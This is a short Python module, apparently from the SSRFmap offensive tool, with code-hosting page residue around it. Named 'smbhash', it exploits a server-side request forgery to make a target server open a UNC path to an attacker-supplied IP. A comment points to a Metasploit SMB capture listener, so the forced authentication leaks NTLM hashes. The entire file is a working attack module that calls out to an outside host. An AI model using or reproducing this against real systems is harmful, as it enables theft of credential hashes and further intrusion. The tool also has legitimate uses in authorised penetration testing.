31 lines
936 B
Python
31 lines
936 B
Python
from core.utils import *
|
|
import logging
|
|
|
|
# NOTE
|
|
# Use auxiliary/server/capture/smb from Metasploit to setup a listener
|
|
|
|
name = "smbhash"
|
|
description = "Force an SMB authentication attempt by embedding a UNC path (\\SERVER\SHARE) "
|
|
author = "Swissky"
|
|
documentation = []
|
|
|
|
class exploit():
|
|
UNC_EXAMPLE = "\\\\192.168.1.2\\SSRFmap"
|
|
UNC_IP = "192.168.1.2"
|
|
UNC_FILE = "SSRFmap"
|
|
|
|
def __init__(self, requester, args):
|
|
logging.info(f"Module '{name}' launched !")
|
|
|
|
UNC_IP = input("UNC IP (default: 192.168.1.2): ")
|
|
if UNC_IP != '':
|
|
self.UNC_IP = UNC_IP
|
|
|
|
UNC_FILE = input("UNC File (default: SSRFmap): ")
|
|
if UNC_FILE != '':
|
|
self.UNC_FILE = UNC_FILE
|
|
|
|
payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)
|
|
r = requester.do_request(args.param, payload)
|
|
logging.info(f"\033[32mSending UNC Path\033[0m : {payload}")
|